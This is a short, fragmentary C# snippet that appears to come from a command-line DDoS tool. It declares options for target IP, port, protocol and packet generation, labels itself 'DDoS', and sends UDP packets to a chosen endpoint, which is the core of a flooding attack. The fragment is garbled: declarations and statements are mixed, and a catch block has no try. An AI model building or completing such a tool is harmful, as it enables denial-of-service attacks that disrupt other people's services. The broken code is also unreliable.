using System.Net.Sockets;
public static string cmd01 = "-help";
public static string cmd02 = "-port";
public static string cmd03 = "-ip";
public static string cmd04 = "-protocol";
public static string cmd05 = "-pkgen";
public static string cmd06 = "-web";
public static string caller = "DDoS";
public static char[] text;
public static string txtfile;
public static int count = 0;
public static string help;
public static bool loop = false;
byte[] packetdata = Encoding.ASCII.GetBytes(text);
IPEndPoint ep = new IPEndPoint(IPAddress.Parse(ip), port);
Socket sock = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp);
sock.SendTo(packetdata,ep);
catch(SystemException ex){